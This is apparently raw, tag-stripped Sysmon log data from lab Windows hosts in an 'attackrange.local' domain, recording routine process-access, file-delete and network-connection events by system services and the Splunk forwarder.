b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.980{466BC892-32D3-60E8-770B-00000000CF01}63569824C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.980{466BC892-32D3-60E8-770B-00000000CF01}63569824C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.980{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\nt
dll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.965{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.612{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2726CAAFB0C461532DAC4E3F4A29DEF,SHA256=7A06BCB9F9A2A8CAFAC6197838F6D735DB2C6E020F51229D9BD90CF96EEDAB90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807478Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:39.071{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CF82DC65DD29E68BF2B1A3D037F3881,SHA256=F9B86F7BE1AADA4EE83EF95567F7A6C22F5C1B87E7DC95F30C9ECAF13B49F705,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.596{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.596{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:40.612{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5057A6BF449BEA358B3F0ED5E634296,SHA256=87D7D5CE7CE402E58809312BD271476A4FC7BDBFF478426920EBCEE4E6CE97C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807479Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:40.102{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8829FE11CEC76EA630777DCB5EE84614,SHA256=25430D843D7F6A97E43897116CAA9D6D08508F5F0CD11C13715B486519F6C2A0,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001048399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\R
PCRT4.dll+1ae1c 10341000x80000000000000001048390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001048385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.627{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E0E2DB695F735E1D7BB267B4A32201B,SHA256=D0A7E2DF850F72A238ABE84721B74BAF0F5182E06A10BFB2C1EBE7267D0FB8C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807480Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:41.118{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AF50C001EFEFE6FB33F89DD7D58EDD1,SHA256=A1803B1126FC13809B19323596443EBC32250C0F483C6507068EA38CDBBE984E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.697{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6025085DB6F309E4325C2AAA81D6358A,SHA256=1467509AF0C3FA246BA700FEA2DA3083A1C21D502EE39322946C5ED5297BBA7C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807482Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:41.297{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57257-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807481Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 